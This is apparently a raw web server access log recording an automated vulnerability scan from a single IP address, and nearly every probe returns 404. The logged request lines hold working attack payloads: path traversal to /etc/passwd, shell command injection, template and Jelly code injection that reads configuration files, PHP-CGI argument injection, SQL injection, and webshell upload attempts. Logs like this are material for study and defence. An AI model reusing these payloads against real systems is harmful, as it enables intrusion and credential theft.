195.164.49.69 - - [18/Nov/2024:23:01:20 +0000] GET /SWNetPerfMon.db.i18n.ashx?l=cdmyk&v=cdmyk HTTP/1.1 404 1099
195.164.49.69 - - [18/Nov/2024:23:01:24 +0000] GET /cgi-bin/stats HTTP/1.1 404 1091
195.164.49.69 - - [18/Nov/2024:23:01:32 +0000] GET /logfile HTTP/1.1 404 1081
195.164.49.69 - - [18/Nov/2024:23:01:36 +0000] GET /dompdf/dompdf/www/setup.php HTTP/1.1 404 1113
195.164.49.69 - - [18/Nov/2024:23:01:40 +0000] GET /cgi-bin/;cat$IFS/etc/passwd HTTP/1.1 404 1113
195.164.49.69 - - [18/Nov/2024:23:01:43 +0000] GET /mifs/asfV3/api/v2/admins/users HTTP/1.1 404 1124
195.164.49.69 - - [18/Nov/2024:23:01:45 +0000] GET /SetupWizard.aspx/FqFQKRQERt HTTP/1.1 404 1105
195.164.49.69 - - [18/Nov/2024:23:01:47 +0000] GET /OS/startup/restore/restoreAdmin.php HTTP/1.1 404 1121
195.164.49.69 - - [18/Nov/2024:23:01:51 +0000] GET /app?service=page/PrinterList HTTP/1.1 404 1077
195.164.49.69 - - [18/Nov/2024:23:01:52 +0000] GET /?pretty HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:23:01:53 +0000] GET /users/sign_in HTTP/1.1 404 1091
195.164.49.69 - - [18/Nov/2024:23:01:54 +0000] GET /apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php/DCbF.css HTTP/1.1 404 1178
195.164.49.69 - - [18/Nov/2024:23:01:55 +0000] GET /.ksh_history HTTP/1.1 404 1086
195.164.49.69 - - [18/Nov/2024:23:01:56 +0000] GET /NON_EXISTING_PATH/ HTTP/1.1 404 1096
195.164.49.69 - - [18/Nov/2024:23:01:58 +0000] GET /dump HTTP/1.1 404 1078
195.164.49.69 - - [18/Nov/2024:23:02:01 +0000] GET /CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en HTTP/1.1 404 1111
195.164.49.69 - - [18/Nov/2024:23:02:02 +0000] GET /analytics/saw.dll?getPreviewImage&previewFilePath=/etc/passwd HTTP/1.1 404 1095
195.164.49.69 - - [18/Nov/2024:23:02:04 +0000] GET /actuator;/env; HTTP/1.1 404 1092
195.164.49.69 - - [18/Nov/2024:23:02:08 +0000] GET /login/../../../etc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [18/Nov/2024:23:02:09 +0000] GET /cgi-bin/test HTTP/1.1 404 1090
195.164.49.69 - - [18/Nov/2024:23:02:17 +0000] GET /s/2p2i90OxG8u0rtWEiin4QklvYsa/_/;/WEB-INF/web.xml HTTP/1.1 404 1143
195.164.49.69 - - [18/Nov/2024:23:02:19 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:23:02:19 +0000] GET /actuator/logfile HTTP/1.1 404 1094
195.164.49.69 - - [18/Nov/2024:23:02:21 +0000] GET /%61%27%22%3e%3c%69%6e%6a%65%63%74%61%62%6c%65%3e HTTP/1.1 404 1122
195.164.49.69 - - [18/Nov/2024:23:02:23 +0000] GET /wp-content/plugins/give/readme.txt HTTP/1.1 404 1120
195.164.49.69 - - [18/Nov/2024:23:02:25 +0000] GET /js/dompdf/www/setup.php HTTP/1.1 404 1109
195.164.49.69 - - [18/Nov/2024:23:02:30 +0000] GET /cgi-bin/config.exp HTTP/1.1 404 1096
195.164.49.69 - - [18/Nov/2024:23:02:36 +0000] GET /wp-admin/admin-ajax.php?action=duplicator_download&file=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 404 1101
195.164.49.69 - - [18/Nov/2024:23:02:38 +0000] GET /_cat/indices?v HTTP/1.1 404 1090
83.212.98.101 - - [18/Nov/2024:23:02:39 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
195.164.49.69 - - [18/Nov/2024:23:02:40 +0000] GET /s/2p2i8zGehRgpdl2lHH65Gc2ROOT/_/;/WEB-INF/web.xml HTTP/1.1 404 1143
195.164.49.69 - - [18/Nov/2024:23:02:40 +0000] GET /owncloud/apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php/ShJo.css HTTP/1.1 404 1191
195.164.49.69 - - [18/Nov/2024:23:02:41 +0000] GET /.sh_history HTTP/1.1 404 1085
195.164.49.69 - - [18/Nov/2024:23:02:42 +0000] GET /openam/oauth2/..;/ccversion/Version HTTP/1.1 404 1125
195.164.49.69 - - [18/Nov/2024:23:02:44 +0000] GET //CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx HTTP/1.1 404 1121
- - - [18/Nov/2024:23:02:45 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [18/Nov/2024:23:02:46 +0000] GET /actuator/dump HTTP/1.1 404 1091
195.164.49.69 - - [18/Nov/2024:23:02:48 +0000] GET /cgi-bin/login_mgr.cgi?C1=ON&cmd=login&f_type=1&f_username=admin&port=80%7Cpwd%26id&pre_pwd=1&pwd=%20&ssl=1&ssl_port=1&username HTTP/1.1 404 1099
195.164.49.69 - - [18/Nov/2024:23:02:51 +0000] GET /message-api/actuator/env HTTP/1.1 404 1106
195.164.49.69 - - [18/Nov/2024:23:02:54 +0000] GET /cgi-bin/status/status.cgi HTTP/1.1 404 1107
- - - [18/Nov/2024:23:02:58 +0000] POST null HTTP/1.1 400 2308
195.164.49.69 - - [18/Nov/2024:23:02:59 +0000] GET /catalog-portal/ui/oauth/verify?error&deviceUdid=%24%7b%22%66%72%65%65%6d%61%72%6b%65%72%2e%74%65%6d%70%6c%61%74%65%2e%75%74%69%6c%69%74%79%2e%45%78%65%63%75%74%65%22%3f%6e%65%77%28%29%28%22%63%61%74%20%2f%65%74%63%2f%68%6f%73%74%73%22%29%7d HTTP/1.1 404 1116
195.164.49.69 - - [18/Nov/2024:23:03:01 +0000] GET /core HTTP/1.1 404 1078
195.164.49.69 - - [18/Nov/2024:23:03:01 +0000] GET /actuators/logfile HTTP/1.1 404 1095
195.164.49.69 - - [18/Nov/2024:23:03:04 +0000] GET /portal/application/libraries/dompdf/www/setup.php HTTP/1.1 404 1143
195.164.49.69 - - [18/Nov/2024:23:03:09 +0000] GET /wp-admin/admin-ajax.php?action=duplicator_download&file=%2F..%2Fwp-config.php HTTP/1.1 404 1101
195.164.49.69 - - [18/Nov/2024:23:03:10 +0000] GET /_all/_search HTTP/1.1 404 1090
195.164.49.69 - - [18/Nov/2024:23:03:11 +0000] GET /.zsh_history HTTP/1.1 404 1086
195.164.49.69 - - [18/Nov/2024:23:03:12 +0000] GET /test.cgi HTTP/1.1 404 1082
195.164.49.69 - - [18/Nov/2024:23:03:13 +0000] GET /sites/all/libraries/dompdf/www/setup.php HTTP/1.1 404 1134
195.164.49.69 - - [18/Nov/2024:23:03:14 +0000] GET /_cluster/health?pretty HTTP/1.1 404 1093
195.164.49.69 - - [18/Nov/2024:23:03:15 +0000] GET /debug.cgi HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:23:03:16 +0000] GET /vendor/dompdf/dompdf/www/setup.php HTTP/1.1 404 1124
195.164.49.69 - - [18/Nov/2024:23:03:17 +0000] GET /cgi-bin/test-cgi HTTP/1.1 404 1094
195.164.49.69 - - [18/Nov/2024:23:04:17 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:23:04:20 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:23:04:23 +0000] POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1 404 1126
195.164.49.69 - - [18/Nov/2024:23:04:23 +0000] POST /_search?pretty HTTP/1.1 404 1081
195.164.49.69 - - [18/Nov/2024:23:04:26 +0000] POST / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:23:04:29 +0000] PUT /fileserver/2p2jRGaJSDtt4bkj2bvauW9g5Fr.txt HTTP/1.1 405 1050
- - - [18/Nov/2024:23:04:31 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [18/Nov/2024:23:04:33 +0000] POST /invoker/JMXInvokerServlet/ HTTP/1.1 404 1108
195.164.49.69 - - [18/Nov/2024:23:04:35 +0000] PUT /2p2jRFUlwXcVnawT34RejgujJUq.jsp/ HTTP/1.1 405 1050
195.164.49.69 - - [18/Nov/2024:23:04:40 +0000] GET /__ HTTP/1.1 404 1076
195.164.49.69 - - [18/Nov/2024:23:04:40 +0000] POST /integration/saveGangster.action HTTP/1.1 404 1109
195.164.49.69 - - [18/Nov/2024:23:04:43 +0000] GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 404 1148
195.164.49.69 - - [18/Nov/2024:23:04:48 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:23:04:53 +0000] POST /soap.cgi?service=whatever-control;curl HTTP/1.1 404 1082
195.164.49.69 - - [18/Nov/2024:23:04:55 +0000] POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1 404 1091
195.164.49.69 - - [18/Nov/2024:23:04:59 +0000] POST /account HTTP/1.1 404 1081
195.164.49.69 - - [18/Nov/2024:23:04:59 +0000] POST /account HTTP/1.1 404 1081
195.164.49.69 - - [18/Nov/2024:23:05:02 +0000] POST /CMSPages/Staging/SyncServer.asmx/ProcessSynchronizationTaskData HTTP/1.1 404 1149
195.164.49.69 - - [18/Nov/2024:23:05:03 +0000] POST /password_change.cgi HTTP/1.1 404 1093
195.164.49.69 - - [18/Nov/2024:23:05:07 +0000] POST /apply_sec.cgi HTTP/1.1 404 1087
195.164.49.69 - - [18/Nov/2024:23:05:09 +0000] GET /solr/admin/cores?wt=json HTTP/1.1 404 1098
195.164.49.69 - - [18/Nov/2024:23:05:11 +0000] GET /fileserver/2p2jRGaJSDtt4bkj2bvauW9g5Fr.txt HTTP/1.1 404 1120
195.164.49.69 - - [18/Nov/2024:23:05:13 +0000] POST /invoker/EJBInvokerServlet/ HTTP/1.1 404 1108
195.164.49.69 - - [18/Nov/2024:23:05:15 +0000] GET /Telerik.Web.UI.WebResource.axd?type=rau HTTP/1.1 404 1104
195.164.49.69 - - [18/Nov/2024:23:05:17 +0000] POST /wls-wsat/CoordinatorPortType HTTP/1.1 404 1100
195.164.49.69 - - [18/Nov/2024:23:05:19 +0000] GET /2p2jRFUlwXcVnawT34RejgujJUq.jsp HTTP/1.1 404 1105
195.164.49.69 - - [18/Nov/2024:23:05:21 +0000] POST /rest/tinymce/1/macro/preview HTTP/1.1 404 1118
195.164.49.69 - - [18/Nov/2024:23:05:23 +0000] POST /node/1?_format=hal_json HTTP/1.1 404 1084
195.164.49.69 - - [18/Nov/2024:23:05:25 +0000] POST /service/extdirect HTTP/1.1 404 1095
195.164.49.69 - - [18/Nov/2024:23:05:28 +0000] GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 404 1156
195.164.49.69 - - [18/Nov/2024:23:05:31 +0000] POST /cgi-bin/supportInstaller HTTP/1.1 404 1102
195.164.49.69 - - [18/Nov/2024:23:05:33 +0000] POST /api/timelion/run HTTP/1.1 404 1098
195.164.49.69 - - [18/Nov/2024:23:05:35 +0000] POST /Autodiscover/Autodiscover.xml HTTP/1.1 404 1107
195.164.49.69 - - [18/Nov/2024:23:05:37 +0000] POST /service/rapture/session HTTP/1.1 404 1105
195.164.49.69 - - [18/Nov/2024:23:05:41 +0000] POST /mifs/.;/services/LogService HTTP/1.1 404 1113
195.164.49.69 - - [18/Nov/2024:23:05:49 +0000] POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1 404 1126
195.164.49.69 - - [18/Nov/2024:23:05:50 +0000] POST /apply_sec.cgi HTTP/1.1 404 1087
83.212.98.101 - - [18/Nov/2024:23:05:50 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
195.164.49.69 - - [18/Nov/2024:23:05:57 +0000] GET /check_browser?lang=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1 404 1087
195.164.49.69 - - [18/Nov/2024:23:05:59 +0000] GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd HTTP/1.1 404 1152
195.164.49.69 - - [18/Nov/2024:23:06:01 +0000] POST /invoker/readonly HTTP/1.1 404 1094
195.164.49.69 - - [18/Nov/2024:23:06:02 +0000] GET /Telerik.Web.UI.WebResource.axd?_TSM_CombinedScripts_=;;System.Web.Extensions,%20Version=4.0.0.0,%20Culture=neutral,%20PublicKeyToken=31bf3856ad364e35:de-DE:db3d9eb3-6d72-4959-b303-32b61119a4a8:ea597d4b:b25378d2 HTTP/1.1 404 1104
195.164.49.69 - - [18/Nov/2024:23:06:04 +0000] POST /EemAdminService/EemAdmin HTTP/1.1 404 1102
195.164.49.69 - - [18/Nov/2024:23:06:07 +0000] POST /api/jsonws/invoke HTTP/1.1 404 1099
195.164.49.69 - - [18/Nov/2024:23:06:09 +0000] POST /api/jsonws/invoke HTTP/1.1 404 1099
195.164.49.69 - - [18/Nov/2024:23:06:10 +0000] POST /wls-wsat/CoordinatorPortType HTTP/1.1 404 1100
195.164.49.69 - - [18/Nov/2024:23:06:12 +0000] POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1 404 1091
195.164.49.69 - - [18/Nov/2024:23:06:14 +0000] GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 404 1160
195.164.49.69 - - [18/Nov/2024:23:06:16 +0000] POST /cgi-bin/mainfunction.cgi HTTP/1.1 404 1102
195.164.49.69 - - [18/Nov/2024:23:06:22 +0000] GET /images/..%2finfo.html HTTP/1.1 400 1169
195.164.49.69 - - [18/Nov/2024:23:06:25 +0000] POST /service/rest/beta/repositories/bower/group HTTP/1.1 404 1136
195.164.49.69 - - [18/Nov/2024:23:06:27 +0000] POST /casa/nodes/thumbprints HTTP/1.1 404 1104
195.164.49.69 - - [18/Nov/2024:23:06:29 +0000] POST /ui/h5-vsan/rest/proxy/service/com.vmware.vsan.client.services.capability.VsanCapabilityProvider/getClusterCapabilityData HTTP/1.1 404 1218
195.164.49.69 - - [18/Nov/2024:23:06:32 +0000] POST /mgmt/shared/authn/login HTTP/1.1 404 1109
195.164.49.69 - - [18/Nov/2024:23:06:51 +0000] POST /users/user-dark-features HTTP/1.1 404 1102
195.164.49.69 - - [18/Nov/2024:23:06:51 +0000] POST /templates/editor-preload-container HTTP/1.1 404 1112
195.164.49.69 - - [18/Nov/2024:23:06:51 +0000] POST /pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1 404 1116
195.164.49.69 - - [18/Nov/2024:23:06:51 +0000] POST /pages/createpage-entervariables.action HTTP/1.1 404 1116
195.164.49.69 - - [18/Nov/2024:23:06:51 +0000] POST /confluence/pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1 404 1131
195.164.49.69 - - [18/Nov/2024:23:06:51 +0000] POST /confluence/pages/createpage-entervariables.action HTTP/1.1 404 1131
195.164.49.69 - - [18/Nov/2024:23:06:51 +0000] POST /wiki/pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1 404 1125
195.164.49.69 - - [18/Nov/2024:23:06:51 +0000] POST /wiki/pages/createpage-entervariables.action HTTP/1.1 404 1125
195.164.49.69 - - [18/Nov/2024:23:06:51 +0000] POST /pages/doenterpagevariables.action HTTP/1.1 404 1111
195.164.49.69 - - [18/Nov/2024:23:06:52 +0000] POST /pages/createpage.action?spaceKey=myproj HTTP/1.1 404 1101
195.164.49.69 - - [18/Nov/2024:23:06:52 +0000] POST /pages/templates2/viewpagetemplate.action HTTP/1.1 404 1122
195.164.49.69 - - [18/Nov/2024:23:06:52 +0000] POST /pages/createpage-entervariables.action HTTP/1.1 404 1116
195.164.49.69 - - [18/Nov/2024:23:06:52 +0000] POST /template/custom/content-editor HTTP/1.1 404 1112
195.164.49.69 - - [18/Nov/2024:23:06:59 +0000] POST /apply_sec.cgi HTTP/1.1 404 1087
195.164.49.69 - - [18/Nov/2024:23:07:05 +0000] POST /wsman HTTP/1.1 404 1079
195.164.49.69 - - [18/Nov/2024:23:07:06 +0000] GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release HTTP/1.1 404 1152
195.164.49.69 - - [18/Nov/2024:23:07:08 +0000] POST /./RestAPI/LogonCustomization HTTP/1.1 404 1110
195.164.49.69 - - [18/Nov/2024:23:07:10 +0000] POST /v1/backend1 HTTP/1.1 404 1089
195.164.49.69 - - [18/Nov/2024:23:07:14 +0000] GET /menu/ss?sid=nsroot&username=nsroot&force_setup=1 HTTP/1.1 404 1085
195.164.49.69 - - [18/Nov/2024:23:07:17 +0000] GET /client/index.php HTTP/1.1 404 1094
195.164.49.69 - - [18/Nov/2024:23:07:17 +0000] GET /laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 404 1162
195.164.49.69 - - [18/Nov/2024:23:07:23 +0000] GET /?rest_route=/wc/v3/wishlist/remove_product/1&item_id=0%20union%20select%20sleep(7)%20--%20g HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:23:07:25 +0000] POST /mgmt/tm/util/bash HTTP/1.1 404 1103
83.212.98.101 - - [18/Nov/2024:23:07:39 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
195.164.49.69 - - [18/Nov/2024:23:07:40 +0000] POST /dologin.action HTTP/1.1 404 1088
195.164.49.69 - - [18/Nov/2024:23:07:42 +0000] POST /api/content/ HTTP/1.1 404 1094
195.164.49.69 - - [18/Nov/2024:23:07:46 +0000] POST /fileupload/toolsAny HTTP/1.1 404 1097
195.164.49.69 - - [18/Nov/2024:23:07:51 +0000] POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.1 404 1127
195.164.49.69 - - [18/Nov/2024:23:07:53 +0000] GET /login.zul HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:23:08:00 +0000] POST /service/extension/backup/mboximport?account-name=admin&ow=2&no-switch=1&append=1 HTTP/1.1 404 1121
195.164.49.69 - - [18/Nov/2024:23:08:01 +0000] GET /zimbraAdmin/0MVzAe6pgwe5go1D.jsp HTTP/1.1 404 1110
195.164.49.69 - - [18/Nov/2024:23:08:01 +0000] POST /service/extension/backup/mboximport?account-name=admin&account-status=1&ow=cmd HTTP/1.1 404 1121
195.164.49.69 - - [18/Nov/2024:23:08:01 +0000] GET /zimbraAdmin/0MVzAe6pgwe5go1D.jsp HTTP/1.1 404 1110
195.164.49.69 - - [18/Nov/2024:23:08:02 +0000] GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license HTTP/1.1 404 1152
195.164.49.69 - - [18/Nov/2024:23:08:04 +0000] POST /./RestAPI/LogonCustomization HTTP/1.1 404 1110
195.164.49.69 - - [18/Nov/2024:23:08:06 +0000] GET /v1/2p2jRI2lHyU7TrsW54TxRCjzDys.php HTTP/1.1 404 1112
195.164.49.69 - - [18/Nov/2024:23:08:08 +0000] GET /api/v2/cmdb/system/admin HTTP/1.1 404 1114
195.164.49.69 - - [18/Nov/2024:23:08:10 +0000] GET /menu/neo HTTP/1.1 404 1086
195.164.49.69 - - [18/Nov/2024:23:08:11 +0000] GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 404 1156
195.164.49.69 - - [18/Nov/2024:23:08:15 +0000] POST /aspera/faspex/package_relay/relay_package HTTP/1.1 404 1127
195.164.49.69 - - [18/Nov/2024:23:08:17 +0000] POST /goanywhere/lic/accept HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:23:08:19 +0000] POST /index.php?c=blocked&action=continue HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:23:08:25 +0000] GET /setup/setupadministrator-start.action HTTP/1.1 404 1115
195.164.49.69 - - [18/Nov/2024:23:08:29 +0000] POST /api/2.0/mlflow/registered-models/create HTTP/1.1 404 1129
195.164.49.69 - - [18/Nov/2024:23:08:31 +0000] GET /2p2jRLfehRAGiWIKR0GhIxHGV6n.jsp HTTP/1.1 404 1105
195.164.49.69 - - [18/Nov/2024:23:09:29 +0000] GET /authenticationendpoint/2p2jrmsavyb2ullytgxxupomcgm.jsp HTTP/1.1 404 1132
195.164.49.69 - - [18/Nov/2024:23:09:32 +0000] GET /app?service=page/SetupCompleted HTTP/1.1 404 1077
195.164.49.69 - - [18/Nov/2024:23:09:38 +0000] GET /hsqldb%0a HTTP/1.1 404 1083
195.164.49.69 - - [18/Nov/2024:23:09:39 +0000] POST /./RestAPI/Connection HTTP/1.1 404 1102
195.164.49.69 - - [18/Nov/2024:23:09:45 +0000] PUT /api/v2/cmdb/system/admin/admin HTTP/1.1 405 1050
195.164.49.69 - - [18/Nov/2024:23:09:47 +0000] GET /menu/stc HTTP/1.1 404 1086
195.164.49.69 - - [18/Nov/2024:23:09:49 +0000] GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 404 1157
195.164.49.69 - - [18/Nov/2024:23:09:51 +0000] DELETE /app/rest/users/id:1/tokens/RPC2 HTTP/1.1 405 1050
195.164.49.69 - - [18/Nov/2024:23:09:53 +0000] GET /WebInterface HTTP/1.1 404 1086
195.164.49.69 - - [18/Nov/2024:23:09:54 +0000] GET /api/server/version HTTP/1.1 404 1100
195.164.49.69 - - [18/Nov/2024:23:09:58 +0000] GET /server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=0&cache2p2jRGGUklfLCxzIsRsaZxkmJAr HTTP/1.1 404 1092
195.164.49.69 - - [18/Nov/2024:23:09:59 +0000] POST /webtools/control/xmlrpc?USERNAME&PASSWORD=2p2jRJiQRDYXgb7sZUxqGjs5nFD&requirePasswordChange=Y HTTP/1.1 404 1105
195.164.49.69 - - [18/Nov/2024:23:10:02 +0000] GET /api/clusters HTTP/1.1 404 1090
195.164.49.69 - - [18/Nov/2024:23:10:04 +0000] POST /api/2.0/mlflow/model-versions/create HTTP/1.1 404 1126
195.164.49.69 - - [18/Nov/2024:23:10:06 +0000] GET /wp-content/plugins/backup-backup/readme.txt HTTP/1.1 404 1129
195.164.49.69 - - [18/Nov/2024:23:10:10 +0000] GET /users/sign_in HTTP/1.1 404 1091
195.164.49.69 - - [18/Nov/2024:23:10:23 +0000] GET /xyz/..CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1 404 1143
83.212.98.101 - - [18/Nov/2024:23:10:51 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
195.164.49.69 - - [18/Nov/2024:23:11:10 +0000] POST /app HTTP/1.1 404 1077
195.164.49.69 - - [18/Nov/2024:23:11:13 +0000] POST /dana-na/auth/saml-sso.cgi HTTP/1.1 404 1107
195.164.49.69 - - [18/Nov/2024:23:11:18 +0000] POST /wp-content/plugins/wp-automatic/inc/csv.php HTTP/1.1 404 1133
195.164.49.69 - - [18/Nov/2024:23:11:19 +0000] POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1 404 1120
195.164.49.69 - - [18/Nov/2024:23:11:20 +0000] GET /help/admin-guide/test.jsp HTTP/1.1 404 1107
195.164.49.69 - - [18/Nov/2024:23:11:23 +0000] GET /helpdesk/WebObjects/Helpdesk.woa/ra/OrionTickets/ HTTP/1.1 404 1143
195.164.49.69 - - [18/Nov/2024:23:11:24 +0000] GET /?InternalDir=/../../../../windows&InternalFile=win.ini HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:23:11:30 +0000] POST /app/rest/users/id:1/tokens/RPC2 HTTP/1.1 404 1125
195.164.49.69 - - [18/Nov/2024:23:11:32 +0000] GET /ui/..%5Csrc%5CgetSettings.rsb?@json HTTP/1.1 400 1160
195.164.49.69 - - [18/Nov/2024:23:11:37 +0000] GET /setup/setupadministrator-start.action HTTP/1.1 404 1115
195.164.49.69 - - [18/Nov/2024:23:11:47 +0000] GET /en-US/login HTTP/1.1 404 1089
83.212.98.101 - - [18/Nov/2024:23:12:40 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
195.164.49.69 - - [18/Nov/2024:23:12:47 +0000] POST /Startup/Register HTTP/1.1 404 1094
195.164.49.69 - - [18/Nov/2024:23:12:49 +0000] POST /app HTTP/1.1 404 1077
195.164.49.69 - - [18/Nov/2024:23:12:51 +0000] POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1 404 1097
195.164.49.69 - - [18/Nov/2024:23:12:54 +0000] POST /tmui/locallb/workspace/fileSave.jsp HTTP/1.1 404 1121
- - - [18/Nov/2024:23:12:56 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [18/Nov/2024:23:12:57 +0000] GET /login.do?jvar_page_title=%3Cstyle%3E%3Cj:jelly%20xmlns:j=%22jelly:core%22%20xmlns:g=%27glide%27%3E%3Cg:evaluate%3Ez=new%20Packages.java.io.File(%22%22).getAbsolutePath();z=z.substring(0,z.lastIndexOf(%22/%22));u=new%20SecurelyAccess(z.concat(%22/co..nf/glide.db.properties%22)).getBufferedReader();s=%22%22;while((q=u.readLine())!==null)s=s.concat(q,%22%5Cn%22);gs.addErrorMessage(s);%3C/g:evaluate%3E%3C/j:jelly%3E%3C/style%3E HTTP/1.1 404 1082
195.164.49.69 - - [18/Nov/2024:23:13:00 +0000] POST /NmConsole/WugSystemAppSettings/JMXSecurity HTTP/1.1 404 1124
195.164.49.69 - - [18/Nov/2024:23:13:04 +0000] POST /apps/zxtm/wizard.fcgi?error=1§ion=Access+Management%3ALocalUsers HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:23:13:07 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:23:13:18 +0000] GET /logs/errors HTTP/1.1 404 1089
195.164.49.69 - - [18/Nov/2024:23:13:22 +0000] GET /roundcube/logs/sendmail HTTP/1.1 404 1105
195.164.49.69 - - [18/Nov/2024:23:13:22 +0000] GET /roundcube/logs/sendmail.log HTTP/1.1 404 1109
195.164.49.69 - - [18/Nov/2024:23:13:22 +0000] GET /roundcube/logs/errors.log HTTP/1.1 404 1107
195.164.49.69 - - [18/Nov/2024:23:13:23 +0000] GET /roundcube/logs/errors HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:23:13:23 +0000] GET /webmail/logs/sendmail HTTP/1.1 404 1103
195.164.49.69 - - [18/Nov/2024:23:13:23 +0000] GET /webmail/logs/sendmail.log HTTP/1.1 404 1107
195.164.49.69 - - [18/Nov/2024:23:13:23 +0000] GET /webmail/logs/errors.log HTTP/1.1 404 1105
195.164.49.69 - - [18/Nov/2024:23:13:23 +0000] GET /webmail/logs/errors HTTP/1.1 404 1101
195.164.49.69 - - [18/Nov/2024:23:13:23 +0000] GET /mail/logs/sendmail HTTP/1.1 404 1100
195.164.49.69 - - [18/Nov/2024:23:13:23 +0000] GET /mail/logs/sendmail.log HTTP/1.1 404 1104
195.164.49.69 - - [18/Nov/2024:23:13:23 +0000] GET /mail/logs/errors.log HTTP/1.1 404 1102
195.164.49.69 - - [18/Nov/2024:23:13:23 +0000] GET /mail/logs/errors HTTP/1.1 404 1098
195.164.49.69 - - [18/Nov/2024:23:13:24 +0000] GET /logs/sendmail HTTP/1.1 404 1091
195.164.49.69 - - [18/Nov/2024:23:13:24 +0000] GET /logs/sendmail.log HTTP/1.1 404 1095
195.164.49.69 - - [18/Nov/2024:23:13:24 +0000] GET /logs/errors.log HTTP/1.1 404 1093
195.164.49.69 - - [18/Nov/2024:23:13:40 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [18/Nov/2024:23:13:41 +0000] POST /setup/setupadministrator.action HTTP/1.1 404 1109
